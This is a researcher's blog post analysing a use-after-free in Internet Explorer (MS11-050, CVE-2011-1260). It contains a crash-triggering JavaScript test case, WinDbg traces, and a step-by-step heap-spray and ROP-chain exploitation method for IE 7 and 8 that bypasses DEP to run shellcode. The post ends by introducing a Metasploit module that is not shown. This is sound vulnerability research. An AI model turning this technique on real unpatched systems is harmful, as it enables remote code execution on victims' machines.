Insecticides don't kill bugs, Patch Tuesdays do
Moved from to here
Patch Tuesdays kill bugs. This post is about a bug that I had independently
found and written an exploit for that was killed last Tuesday with bulletin
(original link: MS11-050).
I’m not sure which CVE this vulnerability has been assigned, all I know is that
[UPDATE] It’s definitely CVE-2011-1260. See Jose’s (of blog post about
(he originally submitted it to ZDI
(ZDI-11-194) ->
MS11-050 has fixed the vulnerability I was using to achieve RCE on IE 7 and 8 (6 and 9 are also affected, but I didn’t make a working exploit for them). This blog post goes over some of the details of the vulnerability, as well as the exploit that I’ve made for it. Note that all examples in this post were made with IE 8.
The Vuln
The vuln is a use-after-free vulnerability in Internet Explorer. This
occurs when invalid mshtml!CObjectElements are handled. When an invalid
element exists in a web page that is covered by other visible
html elements (due to their positioning or styles), formats get computed
on a previously-freed mshtml!CObjectElement
. If other data has happened
to be written over where the object element used to be in memory, invalid
values may be used when the freed object is handled (such as a vtable pointer).
A simple test case is below:
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
Loading this up in a vulnerable version of Internet Explorer should give you a crash on an access violation like the one below:
(170.5c8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=01e88df0 ecx=001f000d edx=00000000 esi=0162c2e8 edi=00000000
eip=3cf76b82 esp=0162c2bc ebp=0162c2d4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
3cf76b82 8b5070 mov edx,dword ptr [eax+70h] ds:0023:00000070=????????
The function it is crashing in is the mshtml!CElement::Doc
0:008> u mshtml!CElement::Doc
3cf76b80 8b01 mov eax,dword ptr [ecx]
3cf76b82 8b5070 mov edx,dword ptr [eax+70h] <-- crashes here
3cf76b85 ffd2 call edx
3cf76b87 8b400c mov eax,dword ptr [eax+0Ch]
3cf76b8a c3 ret
3cf76b8b 90 nop
3cf76b8c 90 nop
3cf76b8d 90 nop
The backtrace should look like this:
0:008> knL
# ChildEBP RetAddr
00 0162c2b8 3cf14ae1 mshtml!CElement::Doc+0x2
01 0162c2d4 3cf14d4a mshtml!CTreeNode::ComputeFormats+0xb9
02 0162c580 3cf239fe mshtml!CTreeNode::ComputeFormatsHelper+0x44
03 0162c590 3cf239be mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
04 0162c5a0 3cf239a5 mshtml!CTreeNode::GetFancyFormatHelper+0xf
05 0162c5b4 3d0a6d9f mshtml!CTreeNode::GetFancyFormat+0x35
06 0162c5bc 3d0a6cfa mshtml!CLineCore::AO_GetFancyFormat+0x23
07 0162c5f0 3cf69f34 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
08 0162cde8 3cfb98e4 mshtml!CDisplay::RecalcLines+0x6e4
09 0162cec4 3cf25d39 mshtml!CDisplay::WaitForRecalc+0x208
0a 0162cf14 3cf4938b mshtml!CFlowLayout::Notify+0x7d7
0b 0162cf20 3cf4745e mshtml!NotifyElement+0x41
0c 0162cf74 3cf473f5 mshtml!CMarkup::SendNotification+0x60
0d 0162cf9c 3cf5254a mshtml!CMarkup::Notify+0xd4
0e 0162cfe4 3cf256ea mshtml!CElement::SendNotification+0x4a
0f 0162d008 3cef1318 mshtml!CElement::EnsureRecalcNotify+0x15f
10 0162d084 3cef2461 mshtml!CDisplayPointer::MoveUnit+0x2b2
11 0162d170 3cef22ce mshtml!CHTMLEditor::AdjustPointer+0x16f
12 0162d1a4 3cef34ed mshtml!CEditTracker::AdjustPointerForInsert+0x8b
13 0162d200 3cef3361 mshtml!CCaretTracker::PositionCaretAt+0x141
Now that you know a little about the crash, you want to know more or less what’s going on, right? After some initial sleuthing, I set the breakpoints below to print out the type of objects that were being allocated and freed by printing out their vtable pointer.
0:008> bl
0 e 635a6811 0001 (0001) 0:**** mshtml!CreateElement+0x57 ".printf \"mshtml!CreateElement created element at %08x, of type: %08x\\n\", poi(ebp+10), poi(poi(ebp+10)); g"
1 e 6362582e 0001 (0001) 0:**** mshtml!CTreeNode::Release+0x27 ".printf \"mshtml!CTreeNode::Release, freeing pointer to obj at %08x, obj at %08x, of type %08x\\n\", edx, poi(edx), poi(poi(edx)); g"
2 e 635a3272 0001 (0001) 0:**** mshtml!CTreeNode::CTreeNode+0x8c ".printf \"mshtml!CTreeNode::CTreeNode allocated obj at %08x, ref to obj %08x of type %08x\\n\", eax, poi(eax), poi(poi(eax)); g"
After setting the breakpoints and reloading the test case in Internet Explorer, windbg should print out something like this:
0:016> g
mshtml!CTreeNode::CTreeNode allocated obj at 0023f220, ref to obj 001f7c50 of type 637666e0 <--- EBX (23f220)
mshtml!CTreeNode::CTreeNode allocated obj at 0023f640, ref to obj 0021a1d8 of type 63630788
mshtml!CTreeNode::CTreeNode allocated obj at 0023f6f0, ref to obj 02bba4f0 of type 6362fa90
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f278, obj at 00213e48, of type 635afad0
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f4e0, obj at 00218948, of type 635af850
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f380, obj at 002140b0, of type 635ba8c0
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f488, obj at 002185e8, of type 635af580
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f328, obj at 00218648, of type 635a21b0
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f118, obj at 0021a088, of type 635ad1f8
mshtml!CTreeNode::CTreeNode allocated obj at 0023f118, ref to obj 00218618 of type 635a21b0
mshtml!CTreeNode::CTreeNode allocated obj at 0023f488, ref to obj 00218588 of type 635af580
mshtml!CTreeNode::CTreeNode allocated obj at 0023f380, ref to obj 00218408 of type 635af850
mshtml!CTreeNode::CTreeNode allocated obj at 0023f4e0, ref to obj 00213b70 of type 635afad0
mshtml!CTreeNode::CTreeNode allocated obj at 0023f278, ref to obj 00213e10 of type 635ba8c0
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f220, obj at 001f7c50, of type 637666e0 <--- EBX (23f220)
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f4e0, obj at 00213b70, of type 635afad0
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f380, obj at 00218408, of type 635af850
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f278, obj at 00213e10, of type 635ba8c0
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f488, obj at 00218588, of type 635af580
mshtml!CTreeNode::Release, freeing pointer to obj at 0023f118, obj at 00218618, of type 635a21b0
(d30.ab4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0023f220 ecx=001f00bd edx=00000000 esi=020be380 edi=00000000 <--- EBX is 23f220
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:00000070=????????
Now that we know the vtable pointer of the object (637666e0
), a quick lookup
will tell us which object we are dealing with:
0:008> ln 637666e0
(637666e0) mshtml!CObjectElement::`vftable' | (63639e88) mshtml!CDummyUnknown::`vftable'
Exact matches:
mshtml!CObjectElement::`vftable' = <no type information>
in this instance is the pointer to the object that IE is calling the
Doc function on, eax then becomes the vtable pointer, and edx is supposed
to be the valid function on the CObjectElement
that is supposed to be called:
(.frame 1 - mshtml!CTreeNode::ComputeFormats+0xb)
3cf14ada 8b0b mov ecx,dword ptr [ebx] <-- ebx = pointer to a CObjectElement
ecx = pointer to vtable
3cf14adc e89f200600 call mshtml!CElement::Doc (3cf76b80)
3cf76b80 8b01 mov eax,dword ptr [ecx] <-- eax = CObjectElement vtable
3cf76b82 8b5070 mov edx,dword ptr [eax+70h] <-- edx = function (vtable+0x70)
3cf76b85 ffd2 call edx
3cf76b87 8b400c mov eax,dword ptr [eax+0Ch]
The function that was supposed to be called is the
0:008> x mshtml!CObjectElement*vftable*
3d2db488 mshtml!CObjectElement::`vftable' = <no type information>
Evaluate expression: 1026405624 = 3d2db4f8
(memory @ 3d2db488 - pointer and symbol:)
00 3d2db488 3cf93385 mshtml!CObjectElement::PrivateQueryInterface
04 3d2db48c 3cf89f6d mshtml!CElement::PrivateAddRef
08 3d2db490 3cf7e481 mshtml!CElement::PrivateRelease
0c 3d2db494 3d2db6e9 mshtml!CObjectElement::`vector deleting destructor'
10 3d2db498 3cebe591 mshtml!CSite::Init
14 3d2db49c 3d2db72e mshtml!CObjectElement::Passivate
18 3d2db4a0 3cf79975 mshtml!CBase::IsRootObject
1c 3d2db4a4 3cf08e95 mshtml!CBase::EnumerateTrackedReferences
20 3d2db4a8 3d1a9a42 mshtml!CBase::SetTrackedState
24 3d2db4ac 3cf4581e mshtml!CElement::GetInlineStylePtr
28 3d2db4b0 3cf2381f mshtml!CElement::GetRuntimeStylePtr
2c 3d2db4b4 3d246af6 mshtml!CBase::VersionedGetIDsOfNames
30 3d2db4b8 3d1cd70f mshtml!CElement::VersionedInvoke
34 3d2db4bc 3d2def3c mshtml!COleSite::VersionedGetDispID
38 3d2db4c0 3d2db832 mshtml!CObjectElement::VersionedInvokeEx
3c 3d2db4c4 3d200dcb mshtml!CBase::VersionedDeleteMemberByName
40 3d2db4c8 3d200e47 mshtml!CBase::VersionedDeleteMemberByDispID
44 3d2db4cc 3cf41bde mshtml!CBase::VersionedGetNextDispID
48 3d2db4d0 3d00deae mshtml!CBase::VersionedGetMemberName
4c 3d2db4d4 3cf41bde mshtml!CBase::VersionedGetNextDispID
50 3d2db4d8 3d246b45 mshtml!CBase::VersionedGetNameSpaceParent
54 3d2db4dc 3d2011b2 mshtml!CBase::GetEnabled
58 3d2db4e0 3d2011b2 mshtml!CBase::GetEnabled
5c 3d2db4e4 3d2df38e mshtml!COleSite::GetPages
60 3d2db4e8 3d2df340 mshtml!COleSite::InterfaceSupportsErrorInfo
64 3d2db4ec 3d2de127 mshtml!CObjectElement::QueryStatus
68 3d2db4f0 3d2de1a7 mshtml!CObjectElement::Exec
6c 3d2db4f4 3cf492cc mshtml!CFlowLayout::IsFlowOrSelectLayout
70 3d2db4f8 3cf76b50 mshtml!CElement::SecurityContext
I noticed that if I comment out one of the tags in the test case (to keep IE from crashing),
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
//document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
and then go into the developer tools and look at the current state of the
DOM, the <object>
element doesn’t show up, probably because I never specified
which type of object it needs to be:
Knowing this, taking another look at the stacktrace of a crash should give
us the gist of the rest:
0:008> k
ChildEBP RetAddr
020be350 63602718 mshtml!CElement::Doc+0x2
020be36c 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
020be618 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
020be628 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
020be638 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
020be64c 637d29ab mshtml!CTreeNode::GetFancyFormat+0x35
020be654 637d2906 mshtml!CLineCore::AO_GetFancyFormat+0x23
020be688 63675c93 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
020bee80 6369985f mshtml!CDisplay::RecalcLines+0x6e4
020bef5c 6361c037 mshtml!CDisplay::WaitForRecalc+0x208
020befac 636514de mshtml!CFlowLayout::Notify+0x7d7
020befb8 636017f2 mshtml!NotifyElement+0x41
020bf00c 6365134f mshtml!CMarkup::SendNotification+0x60
020bf034 63666bc1 mshtml!CMarkup::Notify+0xd4
020bf07c 6361bf07 mshtml!CElement::SendNotification+0x4a
020bf0a0 635d82b7 mshtml!CElement::EnsureRecalcNotify+0x15f
020bf11c 635cc225 mshtml!CDisplayPointer::MoveUnit+0x2b2
020bf208 635cc092 mshtml!CHTMLEditor::AdjustPointer+0x16f
020bf23c 635cd2af mshtml!CEditTracker::AdjustPointerForInsert+0x8b
020bf298 635cd123 mshtml!CCaretTracker::PositionCaretAt+0x141
My guess of the overall flow of things leading up to the crash is that the
element was initially added to some
list of elements to be displayed. The object element then gets deleted
because it is invalid and has nothing to display, but it isn’t removed
from the list. Something happens with the layout where formats need to be
recalculated, and IE tries to call a method on the freed object, leading to
the use-after-free.
The Exploit
The basic plan for exploiting this vulnerability should be to cause the
element to be freed, get data that we control to
overwrite the freed object, and then do something that would cause functions
to be called on the object element. Simple enough. The exploit for IE7 and
IE8 with DEP disabled involves your basic heap spray (nops + shellcode) and
overwriting the CObjectElement
with 0c0c0c0c
s. Once the mshtml!CElement::Doc
function is called, code execution should go something like this:
3cf76b80 8b01 mov eax,dword ptr [ecx] ds:0023:147f00a7=0c0c0c0c
3cf76b82 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=0c0c0c0c
3cf76b85 ffd2 call edx {<Unloaded_sspc.dll>+0xc0c0c0b (0c0c0c0c)} <-- (execute nops+shellcode)
3cf76b87 8b400c mov eax,dword ptr [eax+0Ch]
3cf76b8a c3 ret
The exploit for IE8 with DEP enabled required a ROP payload: the CObjectElement
is overwritten with 0c0c0c0c
s, a second heap-spray should land the ROP
stack at 0c0c0c0c
, and a third heap-spray should land the nops + shellcode
at 0x23000000
. Once everything is all setup, the ROP stack should be found
at 0c0c0c0c
and should look like this:
0c0c0c0c 7c809af1 ; 1:kernel32!VirtualAlloc (first ret)
0c0c0c10 7c901db3 ; 2:ntdll!memcpy (second ret)
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
0c0c0c34 be9e2688 ; random
0c0c0c38 f285b61c ; random
0c0c0c3c e8f23175 ; random
0c0c0c40 6f2edb99 ; random
0c0c0c44 bd93f4eb ; random
0c0c0c48 527787a7 ; random
0c0c0c4c 4991e07d ; random
0c0c0c50 1513dcf2 ; random
0c0c0c54 7b40bc07 ; random
0c0c0c58 ba54da55 ; random
0c0c0c5c 5177fafb ; random
0c0c0c60 b1dfcf01 ; random
0c0c0c64 6643baa9 ; random
0c0c0c68 2136edc5 ; random
0c0c0c6c 31fd6e6b ; random
0c0c0c70 f4a9dcd0 ; random
0c0c0c74 de2f62e1 ; random
0c0c0c78 a19314eb ; random
0c0c0c7c 773e3f18 ; comctl32!CImageList::_IsSameObject+0x40 ; stack pivot
0c0c0c80 3825a2d7 ; random
0c0c0c84 88f8a84d ; random
0c0c0c88 0566b421 ; random
Once the mshtml!CElement::Doc
function is called, code execution should
look like this:
3cf76b80 8b01 mov eax,dword ptr [ecx] ds:0023:35a00002=0c0c0c0c
3cf76b82 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=773e3f18
3cf76b85 ffd2 call edx {comctl32!CImageList::_IsSameObject+0x40 (773e3f18)} ; stack pivot
The first ROP gadget is a stack-pivot that exchanges esp with eax (0c0c0c0c
0:007> u comctl32!CImageList::_IsSameObject+40 L?2
773e3f18 94 xchg eax,esp ; esp is now 0c0c0c0c
773e3f19 c3 ret ; ret to kernel32!VirtualAlloc
After the stack-pivot is called, the stack (esp) should be at 0c0c0c0c
. When
the stack-pivot rets, it will ret into kernel32!VirtualAlloc
, after which
the ROP-stack should look like this:
mem @ esp (rop stack):
0c0c0c10 7c901db3 ; 2:ntdll!memcpy (second ret)
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
should then allocate 0x4000
read/write/execute bytes
at address 0x7f000000
and return to ntdll!memcpy
7c809af1 8bff mov edi,edi
7c809af3 55 push ebp
7c809af4 8bec mov ebp,esp
7c809af6 ff7514 push dword ptr [ebp+14h] ss:0023:0c0c0c20=00000040 ; flProtect (rwx)
7c809af9 ff7510 push dword ptr [ebp+10h] ss:0023:0c0c0c1c=00003000 ; flAllocationType (MEM_COMMIT | MEM_RESERVE)
7c809afc ff750c push dword ptr [ebp+0Ch] ss:0023:0c0c0c18=00004000 ; dwSize
7c809aff ff7508 push dword ptr [ebp+8] ss:0023:0c0c0c14=7f000000 ; lpAddress
7c809b02 6aff push 0FFFFFFFFh
7c809b04 e809000000 call kernel32!VirtualAllocEx (7c809b12)
7c809b09 5d pop ebp
7c809b0a c21000 ret 10h ; ret to ntdll!memcpy
After the ret to ntdll!memcpy
, the ROP-stack should look like this:
mem @ esp:
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
should then copy 0x2fff
bytes from 0x23000100
(should be
nops+shellcode) to 0x7f001000
(rwx memory allocated by call to VirtualAlloc
and return to the nops+shellcode at 0x7f001000
7c901db3 55 push ebp
7c901db4 8bec mov ebp,esp
7c901db6 57 push edi
7c901db7 56 push esi
7c901db8 8b750c mov esi,dword ptr [ebp+0Ch] ss:0023:0c0c0c2c=23000100 ; src
7c901dbb 8b4d10 mov ecx,dword ptr [ebp+10h] ss:0023:0c0c0c30=00002fff ; size
7c901dbe 8b7d08 mov edi,dword ptr [ebp+8] ss:0023:0c0c0c28=7f001000 ; dst
7c901de6 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] ; copy nops+shellcode to 0x7f001000
7c901f4d c9 leave
7c901f4e c3 ret ; ret to 7f001000 (nops+shellcode)
Below is the metasploit module I’ve made to exploit this vulnerability. I’ve tested it on a 32-bit WinXP SP3 fully patched up to (not including) this month’s (June’s) patches: